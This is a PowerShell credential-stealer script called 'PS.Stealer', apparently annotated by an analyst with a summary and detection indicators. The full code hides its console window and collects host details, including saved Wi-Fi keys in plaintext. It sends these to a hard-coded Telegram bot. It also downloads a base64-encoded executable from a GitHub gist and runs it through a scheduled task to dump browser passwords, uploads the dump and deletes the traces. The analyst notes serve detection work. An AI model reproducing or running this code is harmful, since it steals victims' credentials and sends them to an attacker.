# === Copyright (C) 20XX "PS.Stealer" by zetod1ce [github.com/ztd38f] === #
<#
[!] DISCLAIMER [!]
The author fully disclaims any responsibility for the use of this script. The script is provided "AS IS"
and may be changed or updated at any time without notice. Use is permitted only for personal educational
purposes in a strictly controlled environment under professional supervision. All use is entirely at your
own risk.

NOTE(review): this listing was recovered from a collapsed (three-line) rendering. Line breaks below --
including the blank-line placement inside the $info here-string -- were reconstructed and should be
checked against the upstream file before anything is relied on.

Analyst summary (what the visible code does, in order):
  1. WinHide        - calls user32!ShowWindow on this process's console window.
  2. Update-UserVars - rewrites every env: variable so that the executing user's profile path and name
                       are replaced by those of the user logged on at the "console" session.
  3. Host profiling - public IP (ipinfo.io), model, registered owner, OS, locale, CPU, GPU, RAM, disks,
                       and every saved Wi-Fi profile with its key (netsh ... key=clear); the text report
                       is posted to a Telegram chat through the Bot API.
  4. Second stage   - fetches a base64-encoded executable from a GitHub gist, drops it as %TEMP%\wbpv.exe,
                       runs it via a one-shot scheduled task with /stext, uploads the resulting text file
                       to the same chat, then deletes both files and exits.

Detection / IOC notes (all taken from the hard-coded values below):
  - the bot token, chat_id and gist URL are static and can be matched directly;
  - outbound HTTPS to api.telegram.org and ipinfo.io from powershell.exe and curl.exe;
  - "netsh wlan show profile name=... key=clear" child processes;
  - "schtasks /create /tn WebPwd" with a conhost.exe --headless / cmd.exe /c start command line,
    immediately followed by /run and /delete of the same task;
  - %TEMP%\wbpv.exe and %TEMP%\WebPwd.txt created and removed within the same session.
#>

# -- Hide Console -- #
# Maps $flag to the nCmdShow argument of user32!ShowWindow (0 when $flag is true, 1 otherwise) and applies
# it to the window returned by kernel32!GetConsoleWindow. The P/Invoke wrapper class H is compiled inline
# with Add-Type. The call site below passes no argument, so $flag keeps its default of $false.
function WinHide ($flag = $false) {
$v = if ($flag) {0} else {1}
Add-Type 'using System;using System.Runtime.InteropServices;public class H{[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);}'
[H]::ShowWindow([H]::GetConsoleWindow(),$v)>$null
}; WinHide

# -- Update Environment Variables For Current User -- #
# Resolves two accounts: the identity this process runs as ($ConsoleUser, last '\'-separated part of the
# WindowsIdentity name) and the account shown for the "console" session by `query session` ($CurentUser,
# second whitespace-separated field of that line). Each name is translated to a SID, the ProfileList
# registry key supplies ProfileImagePath, and Split('\',2)[1] keeps the part after the drive (e.g.
# "Users\name"). The four values are then emitted to the output stream (unsuppressed expression), and
# every env: variable has the first user's path and name replaced by the second's, so later references
# such as $env:temp and $env:username resolve to the console user's profile.
# NOTE(review): the [1] / [-1] indexing assumes a fixed `query session` layout and a local user name;
# behaviour with no console session, or with a DOMAIN\user principal, is not established by this code.
function Update-UserVars {
$ConsoleUser = ([Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[-1])
$CurentUser = (((query session | sls console) -split '\s+')[1])
$ConsoleUserPathName = ((gp "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$((New-Object Security.Principal.NTAccount($ConsoleUser)).Translate([Security.Principal.SecurityIdentifier]).Value)").ProfileImagePath).Split('\',2)[1]
$CurentUserPathName = ((gp "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\$((New-Object Security.Principal.NTAccount($CurentUser)).Translate([Security.Principal.SecurityIdentifier]).Value)").ProfileImagePath).Split('\',2)[1]
$ConsoleUser, $CurentUser, $ConsoleUserPathName, $CurentUserPathName
# Two chained -replace operations on each value: profile path first, then the bare user name.
gci env: |% {si "env:\$($_.Name)" ($_.Value -replace [regex]::Escape($ConsoleUserPathName), $CurentUserPathName -replace [regex]::Escape($ConsoleUser), $CurentUser)}
}; Update-UserVars

# --- Preparation For Working With The Telegram API --- #
# Exfiltration channel. The bot token and destination chat are hard-coded; treat them as indicators
# (and as the operator's live credentials, usable for takedown/reporting), not as configuration.
$token = "7869005643:AAHpUqFBu9kvEzlpPJOTFq2UIXoluHbCQK8"
$chat_id = "-1002411530510"
$url = "https://api.telegram.org/bot$token"
# Posts a text message to $chat_id with Invoke-RestMethod (-useb = -UseBasicParsing); response discarded.
function Post-Message ([string]$msg){irm -useb "$url/sendMessage" -Method POST -Body @{chat_id = $chat_id; text = $msg} >$null}
# Uploads a file as a Telegram "document" via the curl.exe binary (multipart form, document=@path).
# This is the only place curl.exe is used, which gives it a distinctive process-creation signature.
function Post-File ([string]$file){curl.exe -F chat_id="$chat_id" -F document=@"$file" "$url/sendDocument" >$null}

# --- System Information Gathering & Sending --- #
# Host profiling with built-in cmdlets / WMI. The only network call in this section is the ipinfo.io
# lookup for the public IP. Note $email actually holds the Windows registered-owner string.
$user = whoami
$ip = irm -useb ipinfo.io/ip
$model = (Get-CimInstance CIM_ComputerSystem).Model
$email = (Get-ComputerInfo).WindowsRegisteredOwner
$winver = (Get-WmiObject win32_operatingsystem).Caption+" "+(Get-WmiObject win32_operatingsystem).Version
$lng = (Get-WinSystemLocale).Name
$proc = (Get-WmiObject Win32_Processor).Name.trim()
$gpu = (Get-WmiObject Win32_VideoController).Name
$ram = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum |% {"{0:N1} GB" -f ($_.sum/1GB)}
$disk = (Get-PhysicalDisk).FriendlyName
# One line per logical disk: filesystem/drive (label) used/total GB [percent used].
$diskpart = (Get-WmiObject Win32_LogicalDisk |% {"$($_.FileSystem)/$($_.DeviceID) ($($_.VolumeName)) {0:N1}/{1:N1} [{2:N1}%]`n" -f (($_.Size-$_.FreeSpace)/1GB), ($_.Size/1GB), ((100*($_.Size-$_.FreeSpace))/$_.Size)}).trim()
# Saved Wi-Fi credentials: for every profile name netsh lists, re-query it with key=clear and take the
# value after ':' on the line matching '*content*' (the "Key Content" line on an English locale), so the
# plaintext key is reported next to each SSID. The '*content*' match is locale-dependent.
$wifi = netsh wlan show profiles |? {$_ -match ':\s'} |% {$p=$_.Split(':')[1].Trim();if ($p){"$p [$((netsh wlan show profile name="$p" key=clear |? {$_ -like '*content*'} |% {$_.Split(':')[1].Trim()}))]"}}
# Report body sent as a single Telegram message (line layout reconstructed, see header note).
$info = @"
$user [$ip] [$model] $email
$winver | $lng
$proc | $gpu | $ram
$disk
`n$($diskpart -join "`n")
`n$($wifi -join "`n")
"@
Post-Message $info

# --- Browser Passwords Gathering & Sending --- #
# -- Base64 Encoder / Decoder Function -- #
# Two modes: with $f given, decodes the base64 text $i and writes the bytes to file $f; with $f omitted,
# reads file $i and returns its base64 encoding. Only the decode/write path is exercised below.
function b64($i,$f){if ($f){[IO.File]::WriteAllBytes($f,[Convert]::FromBase64String($i))}else{[Convert]::ToBase64String([IO.File]::ReadAllBytes($i))}}
# Second-stage payload: base64 text is fetched from a GitHub gist and dropped as %TEMP%\wbpv.exe.
# The /stext switch used below is the "save as text" option of the NirSoft recovery tools, so this is
# presumably a browser-password dumper such as WebBrowserPassView -- confirm by decoding the gist.
b64 (irm -useb gist.github.com/ZTD38F/037aca23256dbf558de5cc16feaa42be/raw) "$env:temp\wbpv.exe"
# The binary is not started directly. A one-shot task (/sc once, /st 00:00, run as the current user)
# wraps it in conhost.exe --headless -> cmd.exe /c start, presumably to detach it from this PowerShell
# process; the task is run and deleted straight away, and the script polls once a second for the output.
schtasks /create /tn WebPwd /tr "$env:systemroot\System32\conhost.exe --headless '$env:systemroot\System32\cmd.exe' /c start '' '$env:temp\wbpv.exe' /stext '$env:temp\WebPwd.txt'" /sc once /st 00:00 /ru $env:username /f
schtasks /run /tn WebPwd; schtasks /delete /tn WebPwd /f >$null 2>&1
# NOTE(review): this loop has no timeout; if the dropped binary never writes the file the script spins forever.
while (!(Test-Path "$env:temp\WebPwd.txt")) {sleep 1}
# Exfiltrate the dump, remove both artifacts (rd = Remove-Item), and terminate.
Post-File "$env:temp\WebPwd.txt"
rd "$env:temp\wbpv.exe","$env:temp\WebPwd.txt" -force
exit